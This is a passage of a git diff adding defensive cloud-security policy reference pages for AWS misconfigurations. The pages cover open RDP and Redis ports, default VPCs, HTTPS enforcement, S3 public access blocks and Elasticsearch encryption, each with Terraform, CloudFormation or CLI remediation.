diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/networking-19.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-19.adoc
new file mode 100644
index 000000000..3a08b32a7
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-19.adoc
@@ -0,0 +1,27 @@
+== Security Group attached to EC2 instance allows inbound traffic from all to TCP port 6379 (Redis)
+
+=== Description
+
+Redis should not be publicly accessible from the internet, to protect data from unauthorized access, data loss and possible leakage of sensitive data.
+As a general precaution, if any resource needs to be open to the internet, it must first undergo a security review and approval from DSO.
+
+=== Fix - Runtime
+
+*Procedure*
+
+.
Change the access control policy and security groups to make the Redis endpoint private. + +. Allow access to a specific list of IP addresses. + +. Once the Redis endpoint is not publicly accessible Bridgecrew will automatically close the issue. + +. You can also request exception from the policy violation details page. + +. SecOps will review and involve DSO if required and grant exception; ++ +Bridgecrew will automatically ignore this resource until the expiry of exception. diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/networking-2.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-2.adoc new file mode 100644 index 000000000..f54b5347a --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-2.adoc @@ -0,0 +1,147 @@ +== AWS Security Group allows all traffic on RDP port (3389) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b82f90ce-ed8b-4b49-970c-2268b0a6c2e5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py[CKV_AWS_25] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + +//// +Bridgecrew +Prisma Cloud +* AWS Security Group allows all traffic on RDP port (3389)* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b82f90ce-ed8b-4b49-970c-2268b0a6c2e5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py [CKV_AWS_25] + +|Severity +|LOW + +|Subtype +|Build +, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== +//// + + +=== Description + + +Security groups are stateful and provide filtering of ingress/egress network traffic to AWS resources. 
+We recommend that security groups do not allow unrestricted ingress access to port 3389.
+Removing unfettered connectivity to remote console services, such as RDP, reduces a server's exposure to risk.
+
+////
+=== Fix - Runtime
+
+*AWS Console*
+
+To implement the prescribed state, follow these steps:
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. Open the https://console.aws.amazon.com/vpc/[Amazon VPC console].
+
+. In the left pane, click *Security Groups*.
+
+. For each security group, perform the following:
+a) Select the _security group_.
++
+b) Click *Inbound Rules*.
++
+c) Identify the rules to be removed.
++
+d) Click *X* in the Remove column.
+
+. Click *Save*.
+////
+
+=== Fix - Buildtime
+
+*Terraform*
+
+The issue is the CIDR specified in the ingress rule - "0.0.0.0/0".
+Change it from this:
+
+[source,go]
+----
+resource "aws_security_group" "example" {
+  ...
+  ingress {
+    from_port = 3389
+    to_port   = 3389
+    protocol  = "tcp"
+-   cidr_blocks = ["0.0.0.0/0"]
++   cidr_blocks = ["10.0.0.1/32"]
+  }
+}
+----
+
+*CloudFormation*
+
+* *Resource:* AWS::EC2::SecurityGroup
+* *Arguments:* Properties.SecurityGroupIngress
+
+[source,yaml]
+----
+Type: AWS::EC2::SecurityGroup
+Properties:
+  ...
+  SecurityGroupIngress:
+    - Description: RDP Ingress
+      IpProtocol: tcp
+      FromPort: 3389
+      ToPort: 3389
+-     CidrIp: "0.0.0.0/0"
++     CidrIp: "10.10.10.0/24"
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/networking-27.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-27.adoc
new file mode 100644
index 000000000..61e94068f
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-27.adoc
@@ -0,0 +1,49 @@
+== Uses default settings of a VPC
+
+=== Description
+
+A default VPC is a logically isolated virtual network created automatically for your AWS account when you provision EC2 instances.
+The default settings of a VPC are not suitable for applications that use multi-tier architectures.
+We recommend you create a non-default _hardened_ VPC that suits its specific networking requirements.
+
+=== Fix - Runtime
+
+*CLI Command*
+
+. To list the existing default VPCs, run a describe-vpcs command to return the ID of the default VPC created in the selected AWS region:
++
+[,bash]
+----
+aws ec2 describe-vpcs \
+--region us-east-2 \
+--query 'Vpcs[?(IsDefault==`true`)].VpcId | []'
+----
+
+. The command output should return the requested VPC identifier.
+
+. Run the describe-instances command using the ID of the default VPC as a filter parameter and custom query filters to return the IDs of the EC2 instances:
+
+[,bash]
+----
+aws ec2 describe-instances \
+--region us-east-1 \
+--filters "Name=vpc-id,Values=vpc-id" \
+--query 'Reservations[*].Instances[*].InstanceId[]'
+----
+
+. The command output should return the identifiers of the EC2 instances launched within the default VPC; alternatively it will return an empty array.
+
+.
To remove default VPCs that are not currently in use, use the delete-vpc command:
+
+[,bash]
+----
+aws ec2 delete-vpc --vpc-id vpc-a01106c2
+----
++
+NOTE: You must detach or delete all gateways and resources that are associated with the VPC before you can delete it.
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/networking-29.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-29.adoc
new file mode 100644
index 000000000..169c1e342
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-29.adoc
@@ -0,0 +1,103 @@
+== AWS Elastic Load Balancer v2 (ELBv2) listeners that allow connection requests over HTTP
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 81c50f65-faa1-4d66-b8e2-d26eaeb08447
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ALBListenerHTTPS.py[CKV_AWS_2]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+=== Description
+
+An internet-facing AWS ELB/ALB is a public resource on your network that is completely exposed to the internet.
+It has a publicly resolvable DNS name that can accept HTTP(S) requests from clients over the internet.
+External actors who obtain this information can attempt to access the EC2 instances registered with the load balancer.
+When an AWS ALB has no HTTPS listeners, front-end connections between web clients and the load balancer can become targets for man-in-the-middle attacks and traffic interception techniques.
+
+////
+=== Fix - Runtime
+
+*AWS Console*
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. Open the http://console.aws.amazon.com/ec2/[Amazon EC2 console].
+
+. Navigate to *LOAD BALANCING*, select *Load Balancers*.
+
+.
Select a _load balancer_, then select * Listeners*. + +. To add a _listener_, select * Add Listener*. ++ + +.. For Protocol : port, select HTTPS and keep the default port or type a different port. ++ + +.. For Default actions, do one of the following: Choose Add action, Forward to and choose a target group. ++ + Choose Add action, Redirect to and provide the URL for the redirect. ++ + Choose Add action, Return fixed response and provide a response code and optional response body. ++ +To save the action, select the * checkmark* icon. ++ + +.. For Security policy, it is recommended that you keep the default security policy. ++ + +.. For Default SSL certificate, do one of the following: If you created or imported a _certificate_ using * AWS Certificate Manager*, select * From ACM* and select the _certificate_. ++ + If you uploaded a _certificate_ using * IAM*, select * From IAM* and select the _certificate_. + +. Click * Save*. +//// + +=== Fix - Buildtime + + +*CloudFormation* + + +* *Resource:* AWS::ElasticLoadBalancingV2::Listener +* *Arguments:* Properties.Protocol / Properties.DefaultActions + + +[source,yaml] +---- +Resources: + ListenerHTTPS: + Type: AWS::ElasticLoadBalancingV2::Listener + Properties: + ... + # Option 1: ++ Protocol: HTTPS # Or TCP / TLS / UDP / TCP_UDP + # Option 2: ++ DefaultActions: ++ - Type: redirect ++ RedirectConfig: ++ Protocol: HTTPS + ... 
+---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/networking-31.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-31.adoc new file mode 100644 index 000000000..606e6a17c --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-31.adoc @@ -0,0 +1,84 @@ +== Not every Security Group rule has a description + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3c39f667-b442-4e79-90b2-55161c70d060 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py[CKV_AWS_23] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Descriptions can be up to 255 characters long and can be set and viewed from the AWS Management Console, AWS Command Line Interface (CLI), and the AWS APIs. +We recommend you add descriptive text to each of your Security Group Rules clarifying each rule's goals, this helps prevent developer errors. + +//// +=== Fix - Runtime + + +* AWS Console* + + + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the http://console.aws.amazon.com/vpc/home [Amazon VPC console]. + +. Select * Security Groups*. + +. Select * Create Security Group*. + +. Select a _Security Group_ and review all of the descriptions. + +. To modify the rules and descriptions, click * Edit*. +//// + +=== Fix - Buildtime + + +*Terraform* + + +Add a description to your ingress or egress rule. 
+
+[source,go]
+----
+resource "aws_security_group" "examplea" {
+  name        = var.es_domain
+  description = "Allow inbound traffic to ElasticSearch from VPC CIDR"
+  vpc_id      = var.vpc
+
+  ingress {
+    cidr_blocks = ["10.0.0.0/16"]
+    description = "What does this rule enable"
+    from_port   = 80
+    protocol    = "tcp"
+    to_port     = 80
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/networking-32.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-32.adoc
new file mode 100644
index 000000000..e5ae675ee
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-32.adoc
@@ -0,0 +1,97 @@
+== CloudFront distribution ViewerProtocolPolicy is not set to HTTPS
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| d183c5cd-6fe6-43a9-8fbf-6b4e44c84ec9
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEncryption.py[CKV_AWS_34]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|CloudFormation,Terraform
+
+|===
+
+=== Description
+
+*AWS::CloudFront::Distribution ViewerCertificate* determines the distribution's SSL/TLS configuration for communicating with viewers.
+We recommend you use the *ViewerProtocolPolicy* parameter to enforce secure HTTPS communication between clients and your CloudFront distributions.
+Most browsers and clients released after 2010 support server name indication (SNI).
+AWS recommends accepting HTTPS connections only from viewers that support SNI; accepting HTTPS connections from all viewers, including those that do not support SNI, requires setting SslSupportMethod accordingly and results in additional monthly charges from CloudFront.
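+
+In Terraform, the SNI guidance above maps to the distribution's `viewer_certificate` block. A minimal sketch, assuming a custom domain with an ACM certificate (the ARN below is a placeholder):
+
+[source,go]
+----
+resource "aws_cloudfront_distribution" "example" {
+  ...
+  viewer_certificate {
+    # Placeholder ARN - replace with your own ACM certificate (must live in us-east-1)
+    acm_certificate_arn      = "arn:aws:acm:us-east-1:123456789012:certificate/example"
+    ssl_support_method       = "sni-only" # serve HTTPS only to SNI-capable viewers
+    minimum_protocol_version = "TLSv1.2_2021"
+  }
+}
+----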
+ +//// +=== Fix - Runtime + + +* Procedure* + + +Use * ViewerProtocolPolicy* in the * CacheBehavior* or * DefaultCacheBehavior*, and select * Redirect HTTP to HTTPS* or * HTTPS Only*. +To specify how CloudFront should use SSL/TLS to communicate with your custom origin, use * CustomOriginConfig*. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_cloudfront_distribution +* *Arguments:* `viewer_protocol_policy` under `default_cache_behavior` or `ordered_cache_behavior` must not be `allow-all`. +Acceptable values are `redirect-to-https` or `https-only`. + + +[source,go] +---- +resource "aws_cloudfront_distribution" "cloudfront" { + ... + default_cache_behavior { + ... + target_origin_id = "my-origin" + - viewer_protocol_policy = "allow-all" + + viewer_protocol_policy = "redirect-to-https" + } +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::CloudFront::Distribution +* *Arguments:* `ViewerProtocolPolicy` under Properties.DefaultCacheBehavior or Properties.CacheBehaviors must not be `allow-all`. +Acceptable values are `redirect-to-https` or `https-only`. + + +[source,yaml] +---- +Resources: + CloudFrontDistribution: + Type: 'AWS::CloudFront::Distribution' + Properties: + DistributionConfig: + ... + DefaultCacheBehavior: + ... +- ViewerProtocolPolicy: 'allow-all' ++ ViewerProtocolPolicy: 'https-only' # or 'redirect-to-https' + + CacheBehaviors: + - TargetOriginId: customorigin + ... 
+- ViewerProtocolPolicy: allow-all ++ ViewerProtocolPolicy: https-only # or redirect-to-https +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/networking-4.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-4.adoc new file mode 100644 index 000000000..33acaad6e --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-4.adoc @@ -0,0 +1,108 @@ +== AWS Default Security Group does not restrict all traffic + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2378dbf4-b104-4bda-9b05-7417affbba3f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml[CKV2_AWS_12] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +A VPC comes with a default security group that has an initial setting denying all inbound traffic, allowing all outbound traffic, and allowing all traffic between instances assigned to the security group. +If you do not specify a security group when you launch an instance, the instance is automatically assigned to this default security group. +Security groups are stateful and provide filtering of ingress/egress network traffic to AWS resources. +We recommend that your default security group restricts all inbound and outbound traffic. +The default VPC in every region should have its default security group updated to comply with this recommendation. +Any newly created VPCs will automatically contain a default security group that will need remediation to comply with this recommendation. +Configuring all VPC default security groups to restrict all traffic will encourage least privilege security group development and mindful placement of AWS resources into security groups. +This in-turn reduces the exposure of those resources. 
+ +NOTE: When implementing this recommendation, VPC flow logging is invaluable in determining the least privilege port access required by systems to work properly. VPC flow logging can log all packet acceptances and rejections occurring under the current security groups. This dramatically reduces the primary barrier to least privilege engineering, discovering the minimum ports required by systems in the environment. +Even if the VPC flow logging recommendation described is not adopted as a permanent security measure, it should be used during any period of discovery and engineering for least privileged security groups. + + +//// +=== Fix - Runtime + + +* Procedure* + + +* Security Group Members: ** +To implement the prescribed state, follow these steps: + +. Identify AWS resources that exist within the default security group. + +. Create a set of least privilege security groups for those resources. + +. Place the resources in those security groups. + +. Remove the resources noted in Step 1 from the default security group. + + +* AWS Console* + + +* Security Group State* + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the http://console.aws.amazon.com/vpc/home [Amazon VPC console]. + +. Repeat the next steps for all VPCs, including the default VPC in each AWS region: ++ +a) In the left pane, click * Security Groups*. ++ +b) For each default security group, perform the following: ++ +i) Select the default _security group_. ++ +ii) Click * Inbound Rules*. ++ +iii) Remove any _inbound rules_. ++ +iv) Click * Outbound Rules*. ++ +v) Remove any _outbound rules_. 
+////
+
+=== Fix - Buildtime
+
+*Terraform*
+
+* *Resource:* aws_default_security_group + aws_vpc
+* *Arguments:* vpc_id (of aws_default_security_group)
+
+[source,go]
+----
+resource "aws_default_security_group" "default" {
+  vpc_id = aws_vpc.ok_vpc.id
+}
+----
\ No newline at end of file
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/s3-bucket-should-have-public-access-blocks-defaults-to-false-if-the-public-access-block-is-not-attached.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/s3-bucket-should-have-public-access-blocks-defaults-to-false-if-the-public-access-block-is-not-attached.adoc
new file mode 100644
index 000000000..bca6d3331
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/s3-bucket-should-have-public-access-blocks-defaults-to-false-if-the-public-access-block-is-not-attached.adoc
@@ -0,0 +1,64 @@
+== S3 Bucket does not have public access blocks
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a4d00808-eabf-45b9-84fd-723ddfe0e6de
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml[CKV2_AWS_6]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+=== Description
+
+When you create an S3 bucket, it is good practice to set the additional resource *aws_s3_bucket_public_access_block* to ensure the bucket is never accidentally public.
+We recommend you ensure every S3 bucket has a public access block.
+If a public access block is not attached, it defaults to false.
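+
+Beyond `block_public_acls` and `block_public_policy`, the `aws_s3_bucket_public_access_block` resource also accepts `ignore_public_acls` and `restrict_public_buckets`. A minimal sketch with all four settings enabled (resource and bucket names are illustrative; the check itself only requires the block to be attached):
+
+[source,go]
+----
+resource "aws_s3_bucket" "example" {
+  bucket = "example-bucket"
+}
+
+resource "aws_s3_bucket_public_access_block" "example" {
+  bucket = aws_s3_bucket.example.id
+
+  block_public_acls       = true # reject requests that set a public ACL
+  block_public_policy     = true # reject public bucket policies
+  ignore_public_acls      = true # treat existing public ACLs as private
+  restrict_public_buckets = true # limit access when a public policy exists
+}
+----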
+
+=== Fix - Buildtime
+
+*Terraform*
+
+* *Resource:* aws_s3_bucket, aws_s3_bucket_public_access_block
+* *Arguments:* _bucket_ and _block_public_acls_ of aws_s3_bucket_public_access_block
+
+[source,go]
+----
+resource "aws_s3_bucket" "bucket_good_1" {
+  bucket = "bucket_good"
+}
+
+resource "aws_s3_bucket_public_access_block" "access_good_1" {
+  bucket = aws_s3_bucket.bucket_good_1.id
+
+  block_public_acls   = true
+  block_public_policy = true
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-policies.adoc b/code-security/policy-reference/aws-policies/aws-policies.adoc
new file mode 100644
index 000000000..1e66194ac
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-policies.adoc
@@ -0,0 +1,3 @@
+== AWS Policies
+
+
diff --git a/code-security/policy-reference/aws-policies/aws-serverless-policies/aws-serverless-policies.adoc b/code-security/policy-reference/aws-policies/aws-serverless-policies/aws-serverless-policies.adoc
new file mode 100644
index 000000000..0dd3145d7
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-serverless-policies/aws-serverless-policies.adoc
@@ -0,0 +1,17 @@
+== AWS Serverless Policies
+
+[width=85%]
+[cols="1,1,1"]
+|===
+|Policy|Checkov Check ID| Severity
+
+|xref:bc-aws-serverless-4.adoc[AWS Lambda functions with tracing not enabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py[CKV_AWS_50]
+|LOW
+
+|xref:bc-aws-serverless-5.adoc[AWS Lambda encryption settings environmental variable is not set properly]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py[CKV_AWS_173]
+|LOW
+
+|===
+
diff --git a/code-security/policy-reference/aws-policies/aws-serverless-policies/bc-aws-serverless-4.adoc b/code-security/policy-reference/aws-policies/aws-serverless-policies/bc-aws-serverless-4.adoc
new file mode 100644
index
000000000..5b6ac5f31 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-serverless-policies/bc-aws-serverless-4.adoc @@ -0,0 +1,103 @@ +== AWS Lambda functions with tracing not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e38f45e2-eed5-4617-bbe8-3619b21dd419 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py[CKV_AWS_50] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +X-Ray tracing in lambda functions allows you to visualize and troubleshoot errors and performance bottlenecks, and investigate requests that resulted in an error. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/lambda/ [Amazon Lambda console]. + +. Open the function to modify. + +. Click the * Configuration* tab. + +. Open the * Monitoring and operations tools* on the left side. + +. Click * Edit*. + +. Enable * Active tracing* for AWS X-ray. + +. Click * Save*. 
+
+*CLI Command*
+
+To enable X-Ray tracing for a function, use the following command:
+----
+aws lambda update-function-configuration --function-name MY_FUNCTION \
+--tracing-config Mode=Active
+----
+////
+
+=== Fix - Buildtime
+
+*Terraform*
+
+Add the following block to a Terraform Lambda resource to add X-Ray tracing:
+
+[source,go]
+----
+tracing_config {
+  mode = "Active"
+}
+----
+
+*CloudFormation*
+
+For CloudFormation, use the following block under `Properties`:
+
+[source,yaml]
+----
+TracingConfig:
+  Mode: Active
+----
diff --git a/code-security/policy-reference/aws-policies/aws-serverless-policies/bc-aws-serverless-5.adoc b/code-security/policy-reference/aws-policies/aws-serverless-policies/bc-aws-serverless-5.adoc
new file mode 100644
index 000000000..ea879948f
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-serverless-policies/bc-aws-serverless-5.adoc
@@ -0,0 +1,75 @@
+== AWS Lambda encryption settings environmental variable is not set properly
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| b3c159b3-00cb-42f3-8841-14e434421947
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py[CKV_AWS_173]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+=== Description
+
+You can use environment variables to adjust your function's behavior without updating code.
+An environment variable is a pair of strings stored in a function's version-specific configuration.
+The Lambda runtime makes environment variables available to your code and sets additional environment variables that contain information about the function and invocation request.
+Environment variables are not evaluated prior to the function invocation.
+Any value you define is considered a literal string and is not expanded.
+Perform variable evaluation in your function code.
+
+=== Fix - Buildtime
+
+*Terraform*
+
+* *Resource:* aws_lambda_function
+* *Arguments:* kms_key_arn
+
+[source,go]
+----
+resource "aws_lambda_function" "test_lambda" {
+  filename      = "lambda_function_payload.zip"
+  function_name = "lambda_function_name"
+  role          = aws_iam_role.iam_for_lambda.arn
+  handler       = "index.test"
+
+  # The filebase64sha256() function is available in Terraform 0.11.12 and later.
+  # For Terraform 0.11.11 and earlier, use the base64sha256() and file() functions:
+  # source_code_hash = "${base64sha256(file("lambda_function_payload.zip"))}"
+  source_code_hash = filebase64sha256("lambda_function_payload.zip")
+
+  runtime = "nodejs12.x"
+
++ kms_key_arn = "ckv_km"
+
+  environment {
+    variables = {
+      foo = "bar"
+    }
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-3-enable-encryptionatrest.adoc b/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-3-enable-encryptionatrest.adoc
new file mode 100644
index 000000000..f14e48465
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-3-enable-encryptionatrest.adoc
@@ -0,0 +1,77 @@
+== AWS Elasticsearch domain encryption for data at rest disabled
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 0a54c279-d08a-4443-a93b-6d109addd964
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py[CKV_AWS_5]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+=== Description
+
+Encryption of data at rest is a security feature that helps prevent unauthorized access to your data.
+This feature uses AWS Key Management Service (AWS KMS) to store and manage encryption keys, and the Advanced Encryption Standard algorithm with 256-bit keys (AES-256) to perform the encryption.
+If enabled, the feature encrypts the domain's indices, logs, swap files, all data in the application directory, and automated snapshots.
+We recommend you implement encryption at rest in order to protect a data store containing sensitive information from unauthorized access, and fulfill compliance requirements.
+
+////
+=== Fix - Runtime
+
+*Procedure*
+
+By default, domains do not encrypt data at rest, and you cannot configure existing domains to use EncryptionAtRest.
+To enable EncryptionAtRest, you must create a new domain and migrate Elasticsearch to that domain.
+You will also need, at minimum, read-only permissions to AWS KMS.
+To create a new domain, sign in to your AWS Console, select the Elasticsearch service (under Analytics), and follow these steps:
+
+. Select *Create a new domain*.
+
+. Change the default *Encryption* setting to *enabled*.
+
+. Continue configuring your cluster.
+////
+
+=== Fix - Buildtime
+
+*CloudFormation*
+
+* *Resource:* AWS::Elasticsearch::Domain
+* *Argument:* Properties.EncryptionAtRestOptions.Enabled
+
+[source,yaml]
+----
+Resources:
+  ElasticsearchDomain:
+    Type: AWS::Elasticsearch::Domain
+    Properties:
+      ...
+      EncryptionAtRestOptions:
++       Enabled: True
+----
diff --git a/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-5.adoc b/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-5.adoc
new file mode 100644
index 000000000..daef32483
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-5.adoc
@@ -0,0 +1,73 @@
+== AWS Elasticsearch does not have node-to-node encryption enabled
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| f978f4db-d9b9-41df-bf4f-d8ce52019a9c
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py[CKV_AWS_6]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|CloudFormation, Terraform, TerraformPlan, Serverless
+
+|===
+
+=== Description
+
+The AWS Elasticsearch Service allows you to host sensitive workloads with node-to-node encryption using Transport Layer Security (TLS) for all communications between instances in a cluster.
+Node-to-node encryption ensures that any data sent to the Amazon Elasticsearch Service domain over HTTPS remains encrypted in-flight while it is being distributed and replicated between the nodes.
+
+////
+=== Fix - Runtime
+
+*AWS Console*
+
+To enable the feature, you must create another domain and migrate your data.
+Using the AWS Console, follow these steps:
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. Navigate to the *Analytics* section, select *Elasticsearch Service*.
+
+. To enable _node-to-node encryption_ when you configure a new cluster, select *Node-to-node encryption*.
+////
+
+=== Fix - Buildtime
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::Elasticsearch::Domain
+* *Argument:* Properties.NodeToNodeEncryptionOptions.Enabled
+
+
+[source,yaml]
+----
+Resources:
+  ElasticsearchDomain:
+    Type: AWS::Elasticsearch::Domain
+    Properties:
+      ...
+      NodeToNodeEncryptionOptions:
++        Enabled: True
+----
diff --git a/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-6.adoc b/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-6.adoc
new file mode 100644
index 000000000..ccdf559ab
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-6.adoc
@@ -0,0 +1,78 @@
+== AWS Elasticsearch domain is not configured with HTTPS
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 0dfd7218-7605-4323-a143-8204ca83faea
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py[CKV_AWS_83]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+Amazon Elasticsearch Service (Amazon ES) allows you to build applications without setting up and maintaining your own search cluster on Amazon EC2.
+With Amazon ES, you can configure your domains to require HTTPS traffic, ensuring that communications between your clients and your domain are encrypted.
+We also recommend you configure the minimum TLS version the domain accepts.
+This option is a useful additional security control to ensure that your clients are not misconfigured.
+
+////
+=== Fix - Runtime
+
+
+*AWS Console*
+
+
+To change the policy using the AWS Console, follow these steps:
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. Open the https://console.aws.amazon.com/es/home[Amazon Elasticsearch console].
+
+. Open a domain.
+
+. Select *Actions* > *Modify encryption*.
+
+. Select _Require HTTPS for all traffic to the domain_.
+
+. Click *Submit*.
+////
+
+=== Fix - Buildtime
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::Elasticsearch::Domain
+* *Argument:* Properties.DomainEndpointOptions.EnforceHTTPS
+
+
+[source,yaml]
+----
+Resources:
+  Resource0:
+    Type: 'AWS::Elasticsearch::Domain'
+    Properties:
+      ...
+      DomainEndpointOptions:
++        EnforceHTTPS: True
+----
diff --git a/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-7.adoc b/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-7.adoc
new file mode 100644
index 000000000..8129a9349
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/elastisearch-policies/elasticsearch-7.adoc
@@ -0,0 +1,136 @@
+== AWS Elasticsearch domain logging is not enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| e1acdde6-67fc-4c86-b9f9-a22f87aef03b
